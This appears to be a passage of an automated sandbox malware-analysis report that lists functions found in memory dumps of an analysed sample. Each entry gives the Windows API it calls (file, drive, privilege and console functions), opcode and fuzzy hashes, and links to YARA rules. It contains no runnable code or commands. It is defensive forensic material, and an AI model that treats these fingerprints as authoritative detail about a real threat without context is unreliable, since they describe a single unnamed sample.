                                                    • Opcode ID: fa3fd21cfe2e54cfefab5b69dee299b3579f0c3499d04c2a6e5220d5b3dbcf02
                                                    • Instruction ID: 09dcd3b38a4543044acfa5e34659a39b80402d662035a2dc220ce251e72d19f4
                                                    • Opcode Fuzzy Hash: fa3fd21cfe2e54cfefab5b69dee299b3579f0c3499d04c2a6e5220d5b3dbcf02
                                                    • Instruction Fuzzy Hash: 9D11C472500700EFEB21DF55DC85BA7FBA8EF48720F14846BED459A281D674A9048BB6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0043BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 815d82f8ec8bec2f14b66ac8702b19fd609e0e8d75a18d5d15ba3e912f266225
                                                    • Instruction ID: deaa4873cd438d1e29dcae4ff196b473523b2292c0e1ea8a1c23842498f89b90
                                                    • Opcode Fuzzy Hash: 815d82f8ec8bec2f14b66ac8702b19fd609e0e8d75a18d5d15ba3e912f266225
                                                    • Instruction Fuzzy Hash: EB119072508784AFDB21CF65CC44B52FFF4EF19310F08849AEA858B662D375A818DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC08E5
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 8982db25aa364070e4f1e45025c79fbe93ae1aae7d2b267c923dd5cf17040158
                                                    • Instruction ID: 1302b95034b2d52d0269a1b0e0e3623edc55cee7598fad7c6e3d4e7dc0ccf065
                                                    • Opcode Fuzzy Hash: 8982db25aa364070e4f1e45025c79fbe93ae1aae7d2b267c923dd5cf17040158
                                                    • Instruction Fuzzy Hash: C4110176400300EFFB21CF50DD80FA6FBE8EF04B20F04845AFD099A642C671A9059BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0043A39C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: c61b9cce970880d028ddad4cbf6c791e16e122c0c620fdb5dffafd91336ff6fd
                                                    • Instruction ID: 821563b898c4bc9617cc08ab20423ef78c6a431d136b96a8abef3695c772cf0f
                                                    • Opcode Fuzzy Hash: c61b9cce970880d028ddad4cbf6c791e16e122c0c620fdb5dffafd91336ff6fd
                                                    • Instruction Fuzzy Hash: 64116D714093C49FE7128B15DC54A62BFB4DF47614F0880CBEDC44B253D269A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01FC132F
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 630a50e63c07610dcd746d549ac418f70489523cf1997c7fb8b2bf20f1ba1dce
                                                    • Instruction ID: 8e2287feac9c55da20d0ffb51f46102f01740d53336861dc323824faf0ddf76e
                                                    • Opcode Fuzzy Hash: 630a50e63c07610dcd746d549ac418f70489523cf1997c7fb8b2bf20f1ba1dce
                                                    • Instruction Fuzzy Hash: 8A11C1715083849FEB128F25DC85B96FFE4EF06220F0884EEED458B253D235A818DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01FC0640
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 88d14cf790c32b84d447c852b1c6c19b08af00c69f32de8c91c5436f37626f29
                                                    • Instruction ID: da51a5ee37e04935ec37a608ca0318c3de4ce63a8caa05a5eeb2a3ac938cfe43
                                                    • Opcode Fuzzy Hash: 88d14cf790c32b84d447c852b1c6c19b08af00c69f32de8c91c5436f37626f29
                                                    • Instruction Fuzzy Hash: B611E0B65093809FDB128B15DC94B52BFA4DF02220F0880DBEC858B263D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0043AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: a24fb9ff8eeb449e87a798f5d51a85d046e03b9cfbeb5f6cfc5dfface51d8e9d
                                                    • Instruction ID: b67a76f0b25f7f2eeea6eb9bc16ba6f85f2a55e456e6d4a45d90be1cd75809d0
                                                    • Opcode Fuzzy Hash: a24fb9ff8eeb449e87a798f5d51a85d046e03b9cfbeb5f6cfc5dfface51d8e9d
                                                    • Instruction Fuzzy Hash: AA115EB26403009FEB20DF25DC85B56FBD8EB18721F08C46ADD49CB742D678E814CA76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0043AA71
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 5d87bb30dc07579f17b69177ebb1954f7726e0fa0037283378b603e1fd8080c0
                                                    • Instruction ID: b3d96072060bde99764525d4defb3e5af6fc32b53c853780a5a977b228eaafc3
                                                    • Opcode Fuzzy Hash: 5d87bb30dc07579f17b69177ebb1954f7726e0fa0037283378b603e1fd8080c0
                                                    • Instruction Fuzzy Hash: 6911C17640D7C49FD7128B11DC85A92BFA0EF17320F0980DBDD848F263D269A909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01FC099C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 09acc8850c2f298daf9cf6b81c5948afc1b39b8e5f7f3c6259ffeb35b652842f
                                                    • Instruction ID: 9f69003d8414ba9362f0578957260a69aa758f7d31cff358c9bc7a03bc508f74
                                                    • Opcode Fuzzy Hash: 09acc8850c2f298daf9cf6b81c5948afc1b39b8e5f7f3c6259ffeb35b652842f
                                                    • Instruction Fuzzy Hash: 98119D758093C49FE7228B25DC55B92BFB4EF07324F0980DAE9854B263C265A909DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC0819
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: fdc18bf4e24b7e70dbfea8ae2508df0bfc9c93fdfc38b9485feb5269b9c63679
                                                    • Instruction ID: 74a89f474f6dd9a39dd38256e147114ce89939fb8858a6f484f567ca39ef898a
                                                    • Opcode Fuzzy Hash: fdc18bf4e24b7e70dbfea8ae2508df0bfc9c93fdfc38b9485feb5269b9c63679
                                                    • Instruction Fuzzy Hash: 1B01C076500304EFFB20DF45DD85BA7FB98DF04B20F14C09AFD089A282DA75A9058AB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 0b7c92acce5f7c398cd75bdf10c965d3f6ec59ecb7438ee7499a567c35520d82
                                                    • Instruction ID: 6d5eec65996a44f86ae4279a3717735cd8b66caa2c52f06810b96e702dd1433c
                                                    • Opcode Fuzzy Hash: 0b7c92acce5f7c398cd75bdf10c965d3f6ec59ecb7438ee7499a567c35520d82
                                                    • Instruction Fuzzy Hash: 8411E176904701DFEB20CF55DD84B66FBE4EF05620F08C4AEDD098B612D232E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0043ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 59ee0dbe0c689290cd9b0091cdc0327725b8d236bc013ba7e353b1637fff6c33
                                                    • Instruction ID: af3d8095ef0bb9ea3531963b137ff81fca71d58d221fc06e98d622447cac2ba6
                                                    • Opcode Fuzzy Hash: 59ee0dbe0c689290cd9b0091cdc0327725b8d236bc013ba7e353b1637fff6c33
                                                    • Instruction Fuzzy Hash: 1A11C2B54093809FDB11CF55DC85B92FFA4EF12320F0980ABDD488F253D275A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0043BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 63ebdbd0820d389470cd7265e059f6f87e873f61d9df7bcd4907b9375b21b2dc
                                                    • Instruction ID: 8901b59f27bcbdc81442e5a091ed5f338f20adf2dff9fa1552f79e4ca57a9822
                                                    • Opcode Fuzzy Hash: 63ebdbd0820d389470cd7265e059f6f87e873f61d9df7bcd4907b9375b21b2dc
                                                    • Instruction Fuzzy Hash: 6911A172504B04DFEB20DF95DC85B62FBE4EF18310F0884AADE498A712D375E414DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0043A23E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 4b1fcea22a8f06debff06a0cdf71c6c2367d3cc55bc20f9a41aa2c5e9b800dfd
                                                    • Instruction ID: 2db998ab556d6808ad74efcbdd3a2f20f6ff5672505da03e7d77029c82eb77ec
                                                    • Opcode Fuzzy Hash: 4b1fcea22a8f06debff06a0cdf71c6c2367d3cc55bc20f9a41aa2c5e9b800dfd
                                                    • Instruction Fuzzy Hash: BF018471900600AFE310DF16DD86B76FBE8FB84A20F14816AED089B741D275F915CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01FC109E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 9c61f48c2e37fcc1edc500a2f22fb5da7c5231ca8a97b039edf91c8b64be5c1b
                                                    • Instruction ID: 5e35752f09aa21749bbb8e6cd6497d295535c3fb4835c5734310228f1f7cc060
                                                    • Opcode Fuzzy Hash: 9c61f48c2e37fcc1edc500a2f22fb5da7c5231ca8a97b039edf91c8b64be5c1b
                                                    • Instruction Fuzzy Hash: E4017171900600ABE310DF16DD86B66FBA8FB84A20F14816AED089B741D275B915CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01FC01D0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: c08ad74c489dce2d990e92b9e49b008595d6697ce6968edf3b8aca71687decc5
                                                    • Instruction ID: 74bc516255b62efd860458f5d528d26f7490833284179bd805b1baadf7a3d666
                                                    • Opcode Fuzzy Hash: c08ad74c489dce2d990e92b9e49b008595d6697ce6968edf3b8aca71687decc5
                                                    • Instruction Fuzzy Hash: E2019E76A00305DFEB10DF69DD857A6FBD8EB40620F0884AEEC09CB642DA75E805DA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 2ce5b464bc0420f716836da3b41edf3d23b62896612a897cd65ba8ab0fe7420f
                                                    • Instruction ID: 53c2fb24d971ebda87ff068fc6b416f3ed22d4605eeca56b5534b2937334e0b0
                                                    • Opcode Fuzzy Hash: 2ce5b464bc0420f716836da3b41edf3d23b62896612a897cd65ba8ab0fe7420f
                                                    • Instruction Fuzzy Hash: 1501DF71900200DFEB20CF15DC857A6FBA4EF08720F18C4ABDE098B656D779A804DBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01FC132F
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: dec0a9ec5420ef6181adbbda626524d64a1db7909862e7897e28da697ef9a441
                                                    • Instruction ID: 39f7480b81e82d6b02e41f564b8411d16d17fa821a54376ceef064032adc7deb
                                                    • Opcode Fuzzy Hash: dec0a9ec5420ef6181adbbda626524d64a1db7909862e7897e28da697ef9a441
                                                    • Instruction Fuzzy Hash: 4D01DF72908301DFEB20CF19DD857A5FBE4EF04A24F48C4AEDC098B643D276A814DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0043A94A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: c0fdff150ca11e9ef2c991b4a718ad0079b0d3c0cc3e4a01d11e6d5c6366c158
                                                    • Instruction ID: 4cbcbeb25e81f9b82f6d1c4e0c506aa2aa0044cc0e891b9243b0661d5441b2f3
                                                    • Opcode Fuzzy Hash: c0fdff150ca11e9ef2c991b4a718ad0079b0d3c0cc3e4a01d11e6d5c6366c158
                                                    • Instruction Fuzzy Hash: 5D016D72900601ABE310DF16DD86B26FBA8FB88B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01FC0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 59b93bb1179b48da8a99513a0a51b334435de5e6306c570139107dcfdb7f2061
                                                    • Instruction ID: afe13137a429b5b3cfdf80b441ed7215c313aaefe7ad1e227a641a5ad181c2b0
                                                    • Opcode Fuzzy Hash: 59b93bb1179b48da8a99513a0a51b334435de5e6306c570139107dcfdb7f2061
                                                    • Instruction Fuzzy Hash: 8C01DF76900302DFEB20CF19D985B66FBD4EF00A20F08C0AAEC088F206D676E445DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01FC0502
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: bf258a2e447aa0cfb43160e1e64e1be47cd5999500bac038a32b13c55fcb08ba
                                                    • Instruction ID: 7af830d369d2e8e7b6ffdcdcea347ee18fff8c8fcebe5a2d1c43fc275dcb6a09
                                                    • Opcode Fuzzy Hash: bf258a2e447aa0cfb43160e1e64e1be47cd5999500bac038a32b13c55fcb08ba
                                                    • Instruction Fuzzy Hash: 99016D72900601ABE310DF16DD86B26FBA8FB88B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01FC0640
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: c8db36b7edd891ad0d809f75d4730c4f943358d821d0ff1bb8177b5108e38044
                                                    • Instruction ID: c28963d3700ab7ea9062d729117665c9d6c54e7ff8112269aab90944d86ebab9
                                                    • Opcode Fuzzy Hash: c8db36b7edd891ad0d809f75d4730c4f943358d821d0ff1bb8177b5108e38044
                                                    • Instruction Fuzzy Hash: 2C01F47A504701DFEB208F19D985761FBA4DF45B20F18C0AEEC098B752D676E844EEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0043ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 58547d53da2bca03f1ac6294ea09906b6a353828a498e80d27035a639f133038
                                                    • Instruction ID: bb6e307f926136eef8f45128f71d422bcdc06bd3fef8347ac6c423361bdbc780
                                                    • Opcode Fuzzy Hash: 58547d53da2bca03f1ac6294ea09906b6a353828a498e80d27035a639f133038
                                                    • Instruction Fuzzy Hash: 6801DC31404340DFEB10DF55E889BA2FBA4EF14320F58C0ABCE488F202D279A804CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01FC1148
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: e05a298320c60d3b9e1d0e3d0edf992b40868dce483c52f4ab424df5a9008486
                                                    • Instruction ID: c291e89a55d1cab6c0d45864c462b19e13dc07f93545d9fcdb5367038d3e825e
                                                    • Opcode Fuzzy Hash: e05a298320c60d3b9e1d0e3d0edf992b40868dce483c52f4ab424df5a9008486
                                                    • Instruction Fuzzy Hash: 06F0FF35908740DFEB20CF05D985761FBA8EF44A21F48C09ACC084B313C27AA858DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0043A39C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: f21a2c1e2ef940d4a38b3040f4ce48d25637a8c9907eb8d196c727ae05cebe70
                                                    • Instruction ID: 60cccf0a569c952c9e3d460e7a1e02247f4fc399ea3cd43cc0fecff76e0608c6
                                                    • Opcode Fuzzy Hash: f21a2c1e2ef940d4a38b3040f4ce48d25637a8c9907eb8d196c727ae05cebe70
                                                    • Instruction Fuzzy Hash: CBF0F935444300DFEB20CF06D888726FBA0EF08320F08C09BCC880B302D378A818DAA3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01FC099C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: c24dbd79e1569a4fc36aaf1a9a9b015e4906c586ed75ee08c04266e6ffeda99b
                                                    • Instruction ID: f51ccffa1020ee0fba2382f1ed6051bd44f1ee09d87439b14f88bcf241783760
                                                    • Opcode Fuzzy Hash: c24dbd79e1569a4fc36aaf1a9a9b015e4906c586ed75ee08c04266e6ffeda99b
                                                    • Instruction Fuzzy Hash: CAF02239804304DFEB20CF05D9847A1FBA4EF04B20F08C09AEC4A0B707C676A804DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0043AA71
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 1fe1bb4bbfd46ef31110f72fbcb235c036182732314d6a6efe8f6a277832236b
                                                    • Instruction ID: 2a3977981e8a70318661a94e9336523f35eb8e71d438d17f05cd516eb16ba9b7
                                                    • Opcode Fuzzy Hash: 1fe1bb4bbfd46ef31110f72fbcb235c036182732314d6a6efe8f6a277832236b
                                                    • Instruction Fuzzy Hash: 0BF02D32400744CFEB20EF05D988722FBA0EF08320F08C09BCC890B302D2B8A804DAA3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0043A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: f3c06a3702455501d4aee78f4ec7ab4b6c622eac3b74e7ad490f7cffff398716
                                                    • Instruction ID: ab74f964d63a1ed32ff18a8a3be35186591efa3e1856ea2feff380a08d601ab4
                                                    • Opcode Fuzzy Hash: f3c06a3702455501d4aee78f4ec7ab4b6c622eac3b74e7ad490f7cffff398716
                                                    • Instruction Fuzzy Hash: F411A3725093849FD711CF25DC85B92FFA4DF06220F0980EBED858B253D279A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0043A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 2ffcf8f0d2165ace50192a17eb37eacf3e573a9ac0e73bf5a4131d150defc224
                                                    • Instruction ID: 213d434bd31db7c02d2b9cd7abee8555d8da2fc2faa37801f35b3b6e1696dec0
                                                    • Opcode Fuzzy Hash: 2ffcf8f0d2165ace50192a17eb37eacf3e573a9ac0e73bf5a4131d150defc224
                                                    • Instruction Fuzzy Hash: 7801F272500740DFEB10DF15DC857A6FB94DF08320F18C4ABDC498B342D279A814CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 057108B4, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2201364754.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b48ab1da24c6266a3191a81e2b443a1f40e1c8fb4664e2db9b180da0b7980c5
                                                    • Instruction ID: 4bbdabe12bf3274feba2ded659b0ee0a92dab76547ed43d4780e679dd3be9dfd
                                                    • Opcode Fuzzy Hash: 1b48ab1da24c6266a3191a81e2b443a1f40e1c8fb4664e2db9b180da0b7980c5
                                                    • Instruction Fuzzy Hash: 8731BB5520E3C44FDB13877858B94A53F70AD9315830F81DBD8C5CF4A3EA49488AE3AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A507F7, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2187093315.0000000002A50000.00000040.00000040.sdmp, Offset: 02A50000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a573ba5e480626ed8ab395a47c9da478002202b3b1e167898eae1832d90ec19
